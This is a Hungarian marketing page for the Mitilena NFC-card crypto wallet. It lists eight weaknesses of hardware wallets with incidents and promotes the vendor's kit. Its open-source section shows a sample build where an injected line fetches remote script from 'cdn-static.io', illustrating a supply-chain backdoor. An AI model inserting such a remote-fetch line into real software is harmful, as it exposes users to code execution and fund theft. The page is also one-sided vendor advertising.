8 rés Nyílt forráskód Ellenőrzőlista FAQ
Mitilena Mitilena Wallet Hideg kripto tárca
ONLINE · 22,000+ COINS Tárca létrehozásaLétrehozás
Hardver tárcák · nem nyilvánvaló rések

Egy hardver tárca nem nyilvánvaló rései

Egy eszközt veszel, hogy betömd a lyukakat. Vele újak jönnek: firmware, frissítések, szolgáltatás a számítógépen, kijelző, doboz, gyártói fiók. Nyolc részlet, amelyet a tesztek előnynek sorolnak — és nyolc út, ahogyan 2020–2026 között pénzt vittek el rajtuk.

Valódi esetek dátummal és összeggel A gyártók dokumentációjából A készletünket ugyanarra a listára pontozzuk
A hiba áranyilvános esetek
2026Coldcard · gyenge véletlenség a firmware-ben$100M+
2025Bybit · az aláírók olyat írtak alá, amit nem láttak$1.5B
2024Dark Skippy · a seed két aláíráson át szivárogkutatás
2023Ledger Connect Kit · hátsó ajtó egy könyvtárban$600K
2021Hamis tárcaalkalmazás az App Store-ban17,1 BTC
2020Ledger ügyfél-DB szivárgás · évekig tartó phishing270 000 ember
Nyolc rés

Minden részlet, amelyet a tesztek dicsérnek, külön lyuk

A hardver tárca egy lyukat betöm: a kulcs már nem egy internetes telefonon ül. De az eszköz nem üres. Van firmware-je, frissítései, asztali programja, kijelzője, doboza, eladója a címeddel — és minden részlet olyan támadási felületet ad, ami előtte nem volt. Lent nyolc ilyen részlet: mit mondanak a tesztek, hogyan vitték el a pénzt rajtuk, hogyan zárd be a lyukat, és van-e ez a részlet a készletünkben.

Rés 01

A firmware, amely a kulcsodat létrehozza

A tesztekben: «biztonsági chip — a kulcs az eszközben jön létre, és soha nem hagyja el»

A kulcs egy hatalmas véletlenszám, és a firmware állítja elő. Egy hiba ott — és sokkal kevesebb kulcs van, mint hinnéd: egyszerre törik őket az összes tulajdonosnál, eszközhozzáférés nélkül, évekkel a vásárlás után. A chipnek nincs jelentősége; a lyuk fölötte ül.

Eset
$100M+
Coldcard, 2026. július: egy 2021 óta fennálló firmware build hiba csendben gyenge RNG-re cserélte a hardver RNG-t, amelyet az eszköz sorozatszáma és egy időzítő magozott. A kulcserő körülbelül 40 bitre esett; 5000+ címet ürítettek ki.
Hogyan zárd be a lyukat
Hozhatsz-e saját véletlenséget: kockadobás, saját kifejezés. Az a tárca, amely elfogadja az entrópiádat, nem függ egyetlen firmware-hibától.
Nálunk nincs ez a részlet
A kártyán nincs firmware — titkosított hordozó. A Mitilena Air az eszköz rendszergenerátorából hozza létre a kulcsot; a véletlen szavak helyett saját seed-kifejezést is megadhatsz.
Rés 02

A frissítések, amelyeket fel kell telepítened

A tesztekben: «a gyártó rendszeresen küld biztonsági frissítéseket»

Minden frissítés olyan pillanat, amikor a firmware kicserélhető. A meghamisított firmware két-három hétköznapi aláírásban rejti el a seed darabjait, miközben az eszköz kívülről normálisnak tűnik. A frissítések kihagyása sem opció: ugyanazok a frissítések zárják be a lyukakat.

Eset
2 aláírás
Dark Skippy, 2024. augusztus: a kutatók megmutatták, hogy a rosszindulatú hardver-tárca firmware két tranzakción át kiviszi a teljes seedet. Egy rossz helyről jövő frissítés elég.
Hogyan zárd be a lyukat
Honnan jön a firmware, és ellenőrzi-e az eszköz az aláírását. A legjobb, ha nincs mit frissíteni.
Nálunk nincs ez a részlet
A kártyán nincs mit frissíteni vagy kicserélni. Az aláírás a telefonalkalmazásban történik; a buildjei aláírtak, és az App Store-ból meg a Google Playből jönnek — mint bármely app, amelyet látsz, és magad zársz be.
Rés 03 · Érezd az abszurditást
A tesztekben: «kényelmes gyártói asztali alkalmazás»

Bizalmatlanságra vett tárca, amely háttérszolgáltatással érkezik

Egy okból veszed az eszközt: hogy ne bízz többé a számítógépben. Ahhoz, hogy működjön, ugyanarra a számítógépre háttérszolgáltatást kell telepítened. Te nem írtad, nem indítottad, és nem kontrollálod: a rendszerrel indul, olyan portot hallgat, amelyet a gépeden bármely program eltalálhat, és most is csinál valamit — pontosan mit, nem tudod, és soha nem fogod ellenőrizni.

A tárca bezárása után is futott a háttérben. Évekig. Az egyik legnagyobb gyártónál külön «híd» szolgáltatás volt; 2025-ben magába az alkalmazásba rejtették — a szolgáltatás még mindig ott van, csak az ablakkal együtt hal meg. A legtöbb másiknál asztali program nélkül az eszköz kulcstartó-dísz. Linuxon adj hozzá udev szabályokat, különben a rendszer nem adja oda az USB-t.

Tehát amit azért vettél, hogy ne függj számítógépes programoktól, számítógépes program nélkül nem működik. És nem az, amit látsz — hanem az, ami alatta fut.

Nálunk nincs ez a részlet
A számítógépre semmi sem települ: nincs szolgáltatás, nincs illesztő, nincs port. A közvetítő a telefonodban már meglévő NFC-chip, amelyet a gyártója készített, és az operációs rendszer kezel: csak akkor működik, amikor az app nyitva van, és te magad tapintod a kártyát; a telefon minden alkalommal engedélyt kér. A kártya passzív: nincs akkumulátor, nincs rádió, magától semmit sem csinál. Zárd be az appot — semmi sem marad, ami nélküled futna. Őszintén: telefonalkalmazás továbbra is kell, és olyan, mint a többi — látod, elindítod, magad zárod be. Senki sem lakik a kamrában.
RendszerfigyelőWALLET CLOSED
FolyamatÁllapotFutásidő
HW Wallet Appwallet
te zártad be-
hwwalletdháttérszolgáltatás · USB-híd
fut412d 06:14
a rendszer indította bejelentkezéskornem zárható — szolgáltatás
Makett; a nevek példák. Így nézett ki a számítógép az egyik legnépszerűbb USB-tárcával 2025 előtt; aztán a «hidat» magába az alkalmazásba építették — ugyanaz a szolgáltatás, a listában már nem látszik.
Hasonlat
Ház a magánéletért — és egy bérlő a kamrában

Házat akartál a magánéletért. Megvetted. Aztán kellett a biztonság — telepítették. És hogy a biztonsági terv működjön, kérték, hogy engedj be egy egyenruhás embert a házba, aki éjjel-nappal a kamrádban lakik, minden ajtó kulcsát tartja, és valaki másnak jelent. Te nem vetted fel, nem rúghatod ki, és hogy mit csinál éjszaka — nem tudod.

Persze «a miénk». A szerződésben is ez áll. Magánéletet akartál, és helyettesítőt kaptál: házat olyan bérlővel, akit nem te választottál.

Rés 04 · A nyílt forráskód nem audit
A tesztekben: «nyílt forráskód — bárki ellenőrizheti»

A nyílt forráskód a programozók közös munkamódja, nem pecsét arra, hogy a program nem lop

A nyílt forráskódot azért találták ki, hogy az emberek programokat osszanak meg, és együtt javítsák őket. Együttműködési eszközként kiváló. Soha nem volt minőségi pecsét arra, hogy «ez a szoftver nem lopja el a pénzed», és ezért: nem a forráskódot használod. Azt használod, amit letöltöttél.

A GitHub-tároló és a telefonodon lévő fájl között ott van a build, az app store, a frissítés, a szerver. E lépések bármelyikén bekerülhet egy sor, amely bárhonnan húz be bármit — és a tárolóban nem lesz. A másolatodat nem tudod összevetni a forrással: a boltok lefordított fájlt adnak; a webes tárca azt a kódot kapja, amelyet a szerver ma neked szolgáltat; a böngészőbővítmény éjjel csendben frissül.

A «nyílt» azt jelenti, hogy néhány ember egy napon ellenőrizhet egy verziót. Azt, hogy a te másolatod most mit csinál — ezt nem jelenti.

A tárolóban · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
A telefonodon · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Egy sor a buildben. Nincs a tárolóban, a boltban láthatatlan, az eszközödön fut.
A nyíltság egyik ilyen esetet sem állította meg
Ledger Connect Kit2023
nyílt könyvtár a GitHubon; rosszindulatú verzió került az npm-re; tucatnyi oldal órákon belül élőben betöltötte
Copay / event-stream2018
nyílt tárca; a hátsó ajtó kifejezetten rá célzott függőségből jött
xz utils2024
húsz éve nyílt; a hátsó ajtó a kiadásokban ült, amíg egy mérnök észre nem vette, hogy az SSH-bejelentkezés fél másodperccel lassabb
Coldcard2026
nyílt forráskódú firmware; öt évig tartó build hiba gyenge RNG-re cserélte a hardver RNG-t — kulcsok eszközhozzáférés nélkül törve, 5000+ cím, 100M$+
Ami tényleg működik
Nem más kódjának olvasása — két ellenőrzés, amelyet bárki elvégezhet. Az első a viselkedésaudit: tegyél a számítógépedre egy elfogó proxyt, vezesd át rajta az appot, és nézd, mit küld hova. Nem kell a kódot olvasnod — a forgalom teljesen látszik. A második olyan architektúra, ahol a kódnak nincs mit ellopnia: ha a kulcs soha nem ül hálózatos eszközön, bármely frissítés bármely sora tehetetlen — nincs mit elküldenie.
Nálunk hogyan
Az elsőt magunk kínáljuk: vezesd át az appunkat proxyn, a webverziót a böngésző DevTools-án, és nézd meg minden kérést. Az aláírókulcs és a seed nem jelenik meg; az egyetlen kivétel a Monero view key — a «hogyan megy ki az átutalás» oldalon magyarázzuk. A második a készletben van: a kulcs a Mitilena Airben születik internet nélküli eszközön, a kártyán él, és az online appba csak az aláírás jut el — ott már nincs mit proxyzni. És az offline itt valódi: air-gap módban a kulcsoszköz semmihez sem kapcsolódik — nincs kábel, nincs Bluetooth; a tranzakció QR-ként megy be és ki, amit a szemeddel látsz. Nem «hideg» tárca kábelen, online számítógépen lógva, a saját szolgáltatásával ki tudja, mit cserélve.
Rés 05

Kijelző, amelyen nem látod, mit írsz alá

A tesztekben: «erősítsd meg az eszköz kijelzőjén — a számítógépen lévő vírus tehetetlen»

A kijelző apró, és gyakran hash-t vagy «szerződéshívást» mutat, nem a címet és az összeget. Olyat erősítesz meg, amit nem látsz — az aláírás pedig továbbra is őszinte, a tiéd. A kijelző a kontroll érzetét adja, amely nincs meg.

Eset
$1.5B
Bybit, 2025. február: hardver tárcás aláírók olyan átutalást erősítettek meg, amely a felületen hétköznapinak tűnt. Az eszközök olyan adatot mutattak, amelyet ember nem tudott ellenőrizni.
Hogyan zárd be a lyukat
Címzett, összeg és művelettípus emberi nyelven — nem hash —, és egygombos elutasítás.
Nálunk hogyan
Van kijelző, de az a telefon kijelzője: cím, összeg és kéréstípus szavakkal — átutalás, szerződéshívás, jóváhagyás —, és Elutasítás gomb. Nagy összegeknél — külön offline eszköz, amely a teljes tranzakciót kapja.
Rés 06

Doboz, amelyben már van seed

A tesztekben: «biztonsági pecséttel lezárt dobozban érkezik»

A fizikai eszköz szállítást, közvetítőket és «kedvezményes» piactereket jelent. A tárca előre beállítva érkezik, belül papíron a seeddel. Vagy a boltban egy hasonmás app azt kéri: «írd be a seedet az aktiváláshoz».

Eset
17,1 BTC
App Store, 2021: egy hardver tárca tulajdonosa hasonmás appba írta a seedet, és 17,1 BTC-t veszített. Ugyanabban az évben, a DB-szivárgás után, a Ledger ügyfeleknek hamis eszközöket postáztak «vidd át a seedet az újra» levéllel.
Hogyan zárd be a lyukat
Magad inicializáld, és soha ne használj olyan seedet, amely készen írva érkezett. A pecsét nem ellenőrzés; az ellenőrzés az, hogy te hozod létre a kulcsot.
Nálunk hogyan
A kártyák üresen érkeznek: te hozod létre a kulcsot, és te írod rá — a dobozban nem lehet kész seed. Az app csak az oldal linkjein át jön az App Store-ból és a Google Playből; a seedet csak importnál és aláíráskor kéri.
Rés 07

Gyártói fiók

A tesztekben: «hivatalos garancia, támogatás és személyes fiók»

Az eszköz megvételéhez megadod a gyártónak a neved, e-mailed és szállítási címed. A biztonságod most az ő adatbázisuktól függ. Ha kiszivárog — évekig kapsz üzeneteket, hogy «erősítsd meg a seedet új eszközön», néha csomagokkal együtt.

Eset
270 000 ember
Ledger, 2020: 270 000 vásárló adata szivárgott ki, postacímekkel együtt. A seed «átvitelét» kérő e-mailek, hívások és csomagok a mai napig mennek.
Hogyan zárd be a lyukat
Minél kevesebbet tudnak rólad, annál rövidebb a vektor: vásárolj fiók nélkül, támogatás, amely soha nem kér seedet, és a szabály: «seedet csak a tolvaj kér».
Nálunk nincs ez a részlet
A tárca regisztráció nélkül működik — nincs fiók. Az eladó csak a szállítási címet ismeri. Sem a támogatás, sem az app nem kér seedet.
Rés 08

Egy eszköz és egy papírcetli

A tesztekben: «strapabíró ház, nagy kijelző, egyhetes akkumulátor»

Minél több alkatrész, annál több törés: csatlakozó, kijelző, akkumulátor. A helyreállítás egy seed-cetlin múlik — elázik, költözéskor elveszik, «biztos, ami biztos» fotózva. A veszteség leggyakoribb oka nem a feltörés.

Eset
≈20 % BTC
A Chainalysis szerint az összes bitcoin körülbelül ötöde örökre elveszett — többnyire elveszett kulcsok miatt, nem feltörés miatt.
Hogyan zárd be a lyukat
Hány kulcsmásolat érkezik a dobozban és milyen formában, mi történik, ha az eszköz elveszik, és van-e benne valami, ami eltörhet.
Nálunk nincs ez a részlet
Nincs kijelző, akkumulátor vagy csatlakozó — nincs mit eltörni. És nem egy másolat: öt tükörmásolat a dobozban — két NFC-kártya és három rejtett matrica vízálló műanyagban, 10+ év.
Ellenőrzőlista

Aminek nem szabadna lennie egy tárcában

Nyolc részlet nyolc réshez. A lista bármely tárcára illik — hardver, mobil, böngésző. Pipáld, mi van azon, amelyet választasz — és nálunk is.

01
Csak szoftver által létrehozott kulcssaját véletlenség nélkül — saját kifejezésed vagy kocka
02
Frissítések ott, ahol a kulcs élminden frissítés lehetőség a kód cseréjére
03
Szolgáltatás, illesztő vagy port a számítógépenlásd rés 03
04
«Nyílt forráskód» pecsét architektúra helyetta kulcs ott ül, ahova idegen kód elér
05
Kijelző, amely hash-t mutat cím és összeg helyettés nincs Elutasítás gomb
06
Készen megírt seed, amely megérkezetta dobozban, levélben, «aktiváló appban»
07
Gyártói fiókés támogatás, amely kérhet seedet
08
Egyetlen másolat és törő alkatrészekkijelző, akkumulátor, csatlakozó, egy cetli
Ezen a listán az Ultimate készletben a nyolc részletből egy sincs. A dobozban: 2 NFC-kártya és 3 rejtett matrica, Mitilena Air (kulcsok internet nélkül) és Mitilena Keys (aláírás internet nélkül). A kártyák üresen érkeznek: te hozod létre és titkosítod a kulcsot — nem gyári chip. Tartalom és ár →
Ultimate · offline készlet

Nem gyári «biztonsági chip» — hordozó, amelyet te titkosítasz

A kártyák üresen érkeznek. A kulcsot a Mitilena Airben hozod létre internet nélküli telefonon, és magad írod rá. Az aláírás a Mitilena Keysön át megy, szintén offline: a tranzakció QR-en utazik. Öt azonos másolat a dobozban: 2 NFC-kártya és 3 rejtett matrica vízálló műanyagban. 18 hálózat, 20 000+ érme, USDT-vel együtt.

A számítógépre semmi sem települ
Nincs firmware, frissítés, kijelző vagy akkumulátor
Tranzakció offline telefonra — hanggal vagy QR-rel, kábel és USB nélkül
Az ingyenes Mitilena telefonalkalmazással működik
Vízálló műanyag, 10+ év eltarthatóság
Világszintű szállítás · mitilena-store.com
Mitilena NFC-kártya
Ultimate · offline generálás és aláírás
€369€439
2 NFC-kártya · 3 rejtett matrica · Mitilena Air · Mitilena Keys licenc
Ultimate rendelése · €369 Basic és Premium — minden csomag
FAQ

Amit eddig elolvasva kérdeznek

Hardver tárca előnyei és hátrányai — röviden?

Egy nagy előny: a kulcs nincs internetes telefonon. A hátrányok a fenti nyolc részlet — mindegyik támadási felületet ad. A jó hardver tárca az, amelyben kevesebb részlet van, nem több.

Mi van, ha a telefon kompromittált?

A főtelefonodon lévő kártyával a kulcs az aláírás másodpercére izolált környezetben jelenik meg — ugyanaz a kockázat, mint bármely telefonos tárcánál, csak rövidebb. Az összegnél, amely ijeszt — második réteg: írj alá külön offline eszközön, ahova a tranzakció QR-rel jut el.

Mi van, ha a kártyát ellopják vagy elveszted?

Jelszó nélkül a kártya és a matrica haszontalan műanyag — a kulcs rajtuk titkosított. Az elveszett másolatot a másik négy pótolja: a dobozból két kártya és három matrica tükör.

Frissíteni kell a hardver tárca firmware-jét?

Ha a gyártó betömött egy lyukat — igen, és pontosan akkor cserélhető a firmware: ellenőrizd a forrást és az aláírást. A firmware nélküli hordozónak nincs ilyen dilemmája — nincs mit frissíteni, nincs mit kicserélni.

Miben különbözik ez az USB-tárcától?

Kevesebb közvetítő: nincs kábel, illesztő, háttérszolgáltatás vagy asztali program. Egy közvetítő — a telefonod NFC-chipje —, és neked meg az operációs rendszernek felel, nem a tárca gyártójának.

A nyílt forráskód biztonságot jelent?

Azt jelenti: valaki valamikor ellenőrizheti. Nem a kódot használod, hanem amit letöltöttél, és a kettőt nem tudod összevetni. A biztonság abból az architektúrából jön, ahol a kulcs nincs ott, ahova idegen kód elér.

NFC-kártyák offline generálással és aláírással

5 kulcsmásolat · Air · Keys · vagy ingyenes tárca 30 másodperc alatt · Miért gyakran hamis a gyári biztonsági chipre épülő «hideg» hardver tárca →
Ultimate rendelése · €369 Ingyenes tárca létrehozása